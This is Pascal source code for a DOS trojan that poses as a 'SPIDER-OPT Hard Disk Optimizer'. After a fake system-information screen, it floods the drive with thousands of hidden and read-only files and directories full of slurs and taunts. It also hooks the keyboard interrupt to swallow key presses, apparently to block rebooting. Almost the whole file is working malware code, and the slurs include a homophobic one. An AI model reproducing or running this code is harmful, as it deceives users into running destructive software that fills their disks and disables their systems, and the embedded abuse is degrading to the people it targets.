program spider_trojan;

uses crt,dos;

const
  maxfiles     = 1000; { <-- about 4 Megs }
  ver          = '1.00';
  dosds        = $0040;
  dosdsstr     = '0040:';
  d_key        = 56;
  kbd_int      = 9;
  maxlames     = 15000;

type
  Info         = record case word of
                   1 : (b: byte);
                   2 : (w: word);
                   3 : (pac: packed array[0..7] of char);
                 end;
  AddrPtr      = ^FullAddr;
  FullAddr     = record
                   Offset,
                   Segment : word
                 end;
  String4      = string[4];
  String64     = string[64];
  String80     = string[80];

var
  Regs         : registers;
  CrtModeSet,
  DataPtr      : ^Info;
  EquipWord,
  MaxDrives,
  MemSize, I   : word;
  CGA80        : boolean;
  f            : text;
  curdrive,
  numfiles,
  numroot      : integer;
  Kbd_Vec,
  Exit_Vec     : pointer;


  PROCEDURE INT9_ISR(_Flags, _CS, _IP, _AX, _BX, _CX, _DX,
                             _SI, _DI, _DS, _ES, _BP:word);
  INTERRUPT;
  BEGIN
    INLINE(
    $FB/              {STI            ;Allow interrupts}
    $9C/              {PUSHF          ;Save the flags}
    $E4/$60/          {IN   AL,$60    ;READ the keyboard port}
    $24/$7F/          {AND  AL,$7F    ;Mask off "break bit"}
    $3C/<D_KEY/       {CMP  AL,<D_KEY ;Is it a "Del" key?}
    $74/$18/          {JZ   GetOut    ;If so, throw it away}
    $9D/              {POPF         ;Restore the flags}
    $A1/>KBD_VEC+2/   {MOV  AX,[>KBD_VEC+2] ;Old vector seg to AX}
    $8B/$1E/>KBD_VEC/ {MOV  BX,[>KBD_VEC]   ;Old vector ofs to BX}
    $87/$5E/$0E/      {XCHG BX,[BP+$0E] ;Swap ofs w/ return address}
    $87/$46/$10/      {XCHG AX,[BP+$10] ;Swap seg w/ return address}
    $89/$EC/          {MOV  SP,BP ;UNDO procedure's entry code}
    $5D/              {POP  BP}
    $07/              {POP  ES}
    $1F/              {POP  DS}
    $5F/              {POP  DI}
    $5E/              {POP  SI}
    $5A/              {POP  DX}
    $59/              {POP  CX}
    $CB/              {RETF ;in effect, JMP to old vector}
{GetOut:}
    $E4/$61/          {IN   AL,$61  ;Read Kbd controller port}
    $88/$C4/          {MOV  AH,AL}
    $0C/$80/          {OR   AL,$80  ;Set the "reset" bit and}
    $E6/$61/          {OUT  $61,AL  ;  send it back to control}
    $86/$C4/          {XCHG AH,AL   ;Get back control value}
    $E6/$61/          {OUT  $61,AL  ;  and send it too}
    $9D/              {POPF         ;Restore the flags}
    $FA/              {CLI          ;No interrupts }
    $B0/$20/          {MOV  AL,+$20 ;Send an EOI to the}
    $E6/$20);         {OUT  $20,AL  ;  interrupt controller }
  END;



{ ********************** Let's lock up the system ************************** }

Procedure Hold;
Var
   Cnt : Byte;

Begin
  Cnt := 1;
  TextColor(WHITE);                     { Set the error message colors }
  TextBackGround(Red);
  gotoXY(11,11);
  Write('* * * * * * * * *  ACCESS  DENIED  * * * * * * * * * *');
  gotoXY(12,12);
  Write('* * * * * * * * * ACCESS  DENIED * * * * * * * * * *');
  gotoXY(11,13);
  Write('* * * * * * * * *  ACCESS  DENIED  * * * * * * * * * *');
  While (1 = 1) do      { Endless loop ... }
  Begin
      Sound(Cnt);       { ... with an annoying sound }
      if (Cnt > 2000) then Dec(Cnt) else Inc(Cnt);
      Delay(10);
      NoSound;
   end;
end; { EOP Hold }


  procedure GetVersion(var DosVersion : String4);
  begin
    DosVersion:= ' .00';
    Regs.AX   := $3000;
    msdos(Regs);
    DosVersion[1]:= chr(lo(Regs.AX) + ord('0'));
    if hi(Regs.AX) >= 10 then
      DosVersion[3]:= chr((hi(Regs.AX) div 10) + ord('0'));
      DosVersion[4]  := chr((hi(Regs.AX) mod 10) + ord('0'));
end;


procedure ShowVersionInfo;
  var
    DosVersion : String4;
  begin
    GetVersion(DosVersion);
    writeln('DOS Version: ',DosVersion);
    DataPtr:= ptr($F000, $FFF5);
    write ('ROM BIOS Date: ');
    for I:= 0 to 7 do
      write(DataPtr^.PAC[I]);
    writeln;
end;

procedure ShowDriveSpace;
  var
    Drive,
    ValidDrive : byte;
    FreeBytes  : longint;
  begin
    Drive:=2;
    ValidDrive:=0;
    while (Drive < 26) and (ValidDrive < 9) do
      begin
        inc(Drive);
        FreeBytes:=diskfree(Drive);
        if FreeBytes >= 0 then
          begin
            writeln(chr((Drive - 1)+ord('A')),': ',FreeBytes,' Bytes Free '+
                    'out of ',DiskSize(Drive),' Bytes.');
            inc(ValidDrive);
          end;
      end;
end;

procedure fakeintro;
begin
 textcolor (7);
 writeln;
 writeln;
 writeln ('SPIDER-OPT Version '+ver+' Hard Disk Optimizer');
 writeln;
 delay (1500);
 writeln ('System/Disk Information:');
 writeln ('');
 showversioninfo;
 showdrivespace;
 delay(2000);
 writeln;
end;

procedure writefiles;
var numstr,rootstr:string;
    cntt:integer;
begin
 numfiles:=0;
 numroot:=0;
 inc(curdrive);
 writeln ('Optimizing '+chr((curdrive - 1)+ord('A')),': will take approximately ',trunc((maxfiles/5)/60),' minutes.');
 write ('Optimizing Disk '+chr((curdrive - 1)+ord('A')),':');
 repeat
  inc (numfiles);
  write ('.');
  str(numfiles,numstr);
  assign (f,#255+#255+'-'+numstr);
  rewrite (f);
  writeln (f,'YOU LAME DORK FAGGOT SCUM-SUCKING RAT-RAPING LOSER!');
  writeln (f,numstr);
  close (f);
  setfattr (f,Hidden);
 until numfiles>maxfiles;
 if numfiles>=maxfiles then begin
  chdir ('\');
  repeat
   inc (numroot);
   write ('.');
   str(numroot,rootstr);
   assign (f,'DATA'+rootstr);
   rewrite (f);
   writeln (f,'YOU LAME DORK FAGGOT SCUM-SUCKING RAT-RAPING LOSER!');
   close (f);
   setfattr (f,hidden);
   setfattr (f,readonly);
   mkdir (#255+#255+rootstr);
   chdir (#255+#255+rootstr);
   assign (f,'GEEK'+rootstr);
   rewrite (f);
   writeln (f,'YOU LAME DORK FAGGOT SCUM-SUCKING RAT-RAPING LOSER!');
   close (f);
   chdir ('\');
  until numroot>=maxfiles;
  assign (f,'SPIDER.HAH');
  rewrite (f);
  repeat
   writeln (f,'<<< YOU HAVE BEEN HIT BY [P.U.S.H.] YOU LOSER! >>>');
   inc (cntt);
  until cntt>=maxlames;
  close (f);
  setfattr (f,hidden);
  setfattr (f,readonly);
  writeln;
  writeln ('Done Optimizing '+chr((curdrive - 1)+ord('A')),':');
  exit;
 end;
end;

Procedure Box;
Var
   SubLoop : Byte;
Begin
   TextBackGround(Blue);
   TextColor(White);
   gotoXY(9,10);
   Write('Ŀ');
   For SubLoop := 1 to 3 do
   Begin
      gotoXY(9, 10 + SubLoop);
      Write('                                                         ');
   end;
   gotoXY(9,14);
   Write('');
end;

procedure lockup;
var cnt:byte;
begin
 GetIntVec(Kbd_Int,Kbd_Vec);
 SetIntVec(Kbd_Int,@INT9_ISR);
 Exit_Vec := ExitProc;
 {
 Clrscr;
 Begin
  Cnt := 1;
  Box;
  TextColor(WHITE);
  TextBackGround(Red);
  gotoXY(11,11);
  Write('* * * *  ------------------------------------  * * * *');
  gotoXY(12,12);
  Write('* * * * * * ---------------------------- * * * * * * *');
  gotoXY(11,13);
  Write('* * * * * * * * * ---------------- * * * * * * * * * *');
  While (1 = 1) do
  Begin
      Sound(Cnt);
      if (Cnt > 2000) then Dec(Cnt) else Inc(Cnt);
      Delay(10);
      NoSound;
   end;
end;
}
end;

begin
 checkbreak:=false;
 curdrive:=2;
 fakeintro;
 writefiles;
 lockup;
end.
